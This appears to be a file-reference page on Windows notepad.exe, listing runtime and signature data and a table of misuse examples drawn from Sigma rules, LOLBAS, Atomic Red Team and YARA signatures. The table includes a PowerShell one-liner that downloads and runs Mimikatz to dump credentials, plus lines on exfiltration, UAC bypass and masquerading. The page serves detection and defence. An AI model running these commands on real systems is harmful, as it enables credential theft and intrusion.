notepad.exe
- File Path:
C:\Users\user\AppData\Local\Microsoft\WindowsApps\notepad.exe - Description: –help - Notepad (Window Title)
Screenshot
Hashes
Type | Hash
– | –
MD5 |
SHA1 |
SHA256 |
SHA384 |
SHA512 |
SSDEEP |
Runtime Data
Window Title:
–help - Notepad
Open Handles:
| Path | Type |
|---|---|
| (R-D) C:\Windows\Fonts\StaticCache.dat | File |
| (RW-) C:\Windows\System32 | File |
| (RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22000.120_none_9d947278b86cc467 | File |
| \BaseNamedObjects__ComCatalogCache__ | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db | Section |
| \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro | Section |
| \Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
| \Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
| \Sessions\2\BaseNamedObjects\windows_shell_global_counters | Section |
| \Sessions\2\Windows\Theme1077709572 | Section |
| \Windows\Theme3461253685 | Section |
Loaded Modules:
| Path |
|---|
| C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.12.0_x64__8wekyb3d8bbwe\Notepad\Notepad.exe |
| C:\WINDOWS\System32\KERNEL32.DLL |
| C:\WINDOWS\System32\KERNELBASE.dll |
| C:\WINDOWS\SYSTEM32\ntdll.dll |
Signature
- Status: Signature verified.
- Serial:
33000003F16206E3E7EFDA8ABE0000000003F1 - Thumbprint:
5362FAEB842C236D05A729B7FAC85BAA1B68BDCA - Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename:
- Product Name:
- Company Name:
- File Version:
- Product Version:
- Language:
- Legal Copyright:
File Scan
- VirusTotal Detections: Unknown
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | image_load_susp_image_load.yml | - '\notepad.exe' |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | title: Notepad Making Network Connection |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | description: Detects suspicious network connection by Notepad |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ |
DRL 1.0 |
| sigma | net_connection_win_notepad_network_connection.yml | Image\|endswith: '\notepad.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Program Files\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - '\Program Files (x86)\Notepad++\updater\GUP.exe' |
DRL 1.0 |
| sigma | proc_creation_win_susp_gup.yml | - Execution of tools named GUP.exe and located in folders different than Notepad++\updater |
DRL 1.0 |
| LOLBAS | Gpup.yml | Description: Execute another command through gpup.exe (Notepad++ binary). |
|
| LOLBAS | Gpup.yml | - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe ' |
|
| LOLBAS | Explorer.yml | - Command: explorer.exe C:\Windows\System32\notepad.exe |
|
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
|
| LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. |
|
| LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" |
|
| LOLBAS | Forfiles.yml | Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. |
|
| LOLBAS | pester.yml | - Command: Pester.bat [/help\|?\|-?\|/?] "$null; notepad" |
|
| LOLBAS | pester.yml | Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad |
|
| LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' |
|
| LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' |
|
| LOLBAS | Cdb.yml | - Command: cdb.exe -cf x64_calc.wds -o notepad.exe |
|
| LOLBAS | Dxcap.yml | - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe |
|
| LOLBAS | Dxcap.yml | Description: Launch notepad as a subprocess of Dxcap.exe |
|
| atomic-red-team | index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | cmd.exe /c %APPDATA%\notepad.exe /B | MIT License. © 2018 Red Canary |
| atomic-red-team | T1036.003.md | del /Q /F %APPDATA%\notepad.exe >nul 2>&1 | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | | process_to_execute | Name or path of process to execute. | String | notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1047.md | You should expect to see notepad.exe running after execution of this test. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1048.003.md | | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute “notepad.exe” within | MIT License. © 2018 Red Canary |
| atomic-red-team | T1053.005.md | Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.001.md | With default arguments, expect to see a MessageBox, with notepad’s icon in taskbar. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.001.md | | process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | | sponsor_binary_path | Path of the sponsor binary (executable that will host the binary) | String | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | | spawnto_process_name | Name of the process to spawn | String | notepad| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1055.012.md | This module executes notepad.exe from within the WINWORD.EXE process | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | $url=’https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1’;$wshell=New-Object -ComObject WScript.Shell;$reg=’HKCU:\Software\Microsoft\Notepad’;$app=’Notepad’;$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName(‘System.Windows.Forms’);@(@(‘iWindowPosY’,(String).Split(‘}’)[0].Split(‘=’)[5]),@(‘StatusBar’,0))|ForEach{SP $reg (Item Variable:).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:).Value.id-ieq$curpid}|ForEach{(Variable ).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys(‘^o’);Start-Sleep -Milliseconds 500;@($url,(‘ ‘*1000),’~’)|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@(‘^a’,’^c’)|ForEach{$wshell.SendKeys((Item Variable:).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@(‘%f’,’x’)|ForEach{$wshell.SendKeys((Variable ).Value)};If(GPS|?{(Item Variable:).Value.id-ieq$curpid}){@(‘{TAB}’,’~’)|ForEach{$wshell.SendKeys((Item Variable:).Value)} };@(‘iWindowPosDY’,’iWindowPosDX’,’iWindowPosY’,’iWindowPosX’,’StatusBar’)|ForEach{SP $reg (Item Variable:).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr | MIT License. © 2018 Red Canary |
| atomic-red-team | T1105.md | Upon successful execution the test will open calculator and Notepad executable for 10 seconds. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Spawns a notepad.exe process as a child of the current process. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1134.004.md | | parent_name | Parent process to spoof from | Path | $Env:windir\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of “svchost.exe” and an Initiating Process Command Line of “svchost.exe -k netsvcs -p -s BITS” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1197.md | | command_path | Path of command to execute | Path | C:\Windows\system32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | “This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | forfiles /p c:\windows\system32 /m notepad.exe /c #{process} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1202.md | | process | Process to execute | String | notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | Copy-Item -Path “$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe” -Destination “$Env:windir\System32\Tasks\notepad.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | InstallUtilPath = “$Env:windir\System32\Tasks\notepad.exe” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.004.md | Remove-Item -Path “$Env:windir\System32\Tasks\notepad.exe” -ErrorAction Ignore | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.007.md | Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.007.md | Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.011.md | | exe_to_launch | Path of the executable to launch | Path | %windir%\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Change Default File Association From cmd.exe of hta to notepad. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.001.md | | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.003.md | After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.003.md | CommandLineTemplate=”$($Env:SystemRoot)\System32\notepad.exe”;} | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.010.md | AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don’t keep getting message boxes showing up. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | <blockquote>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1546.012.md | | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1547.002.md | After a reboot, Notepad.exe will be executed as child process of lsass.exe. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe | MIT License. © 2018 Red Canary |
| atomic-red-team | T1548.002.md | | command.to.execute | Command to execute | String | cmd.exe /c notepad.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | folder to view that the alternate data stream exists. To view the data in the alternate data stream, run “notepad T1564.004_has_ads.txt:adstest.txt” | MIT License. © 2018 Red Canary |
| atomic-red-team | T1564.004.md | in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run “notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt” in the %temp% folder. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.002.md | | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | Path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will |
MIT License. © 2018 Red Canary |
| atomic-red-team | T1574.012.md | still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
| signature-base | apt_bluetermite_emdivi.yar | $s4 = “\NOTEPAD.EXE” fullword ascii | CC BY-NC 4.0 |
| signature-base | apt_molerats_jul17.yar | $s2 = “Notepad++.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_olympic_destroyer.yar | $s3 = “\system32\notepad.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | apt_poisonivy.yar | $s0 = “\notepad.exe” fullword ascii /* score: ‘11.025’ */ | CC BY-NC 4.0 |
| signature-base | apt_ta17_293A.yar | $au2 = “/notepad.png” | CC BY-NC 4.0 |
| signature-base | apt_wildneutron.yar | $n1 = “/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s” fullword ascii /* PEStudio Blacklist: strings / / score: ‘46.00’ */ | CC BY-NC 4.0 |
| signature-base | apt_woolengoldfish.yar | $s4 = “oShellLink.IconLocation = "notepad.exe, 0"” fullword | CC BY-NC 4.0 |
| signature-base | crime_ransom_ragna_locker.yar | $s2 = “\notepad.exe” fullword wide /* Show ransom note to the victim*/ | CC BY-NC 4.0 |
| signature-base | gen_cn_hacktools.yar | $s14 = “NOTEPAD.EXE result.txt” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_powershell_empire.yar | $s2 = “$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru” fullword ascii | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | description = “Abnormal notepad.exe - typical strings not found in file” | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | $winxp = “Software\Microsoft\Notepad” wide | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | $winxp_de = “Software\Microsoft\Notepad” wide | CC BY-NC 4.0 |
| signature-base | thor_inverse_matches.yar | filename == “notepad.exe” | CC BY-NC 4.0 |
| stockpile | 3796a00b-b11d-4731-b4ca-275a07d83299.yml | Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; |
Apache-2.0 |
MIT License. Copyright (c) 2020-2021 Strontic.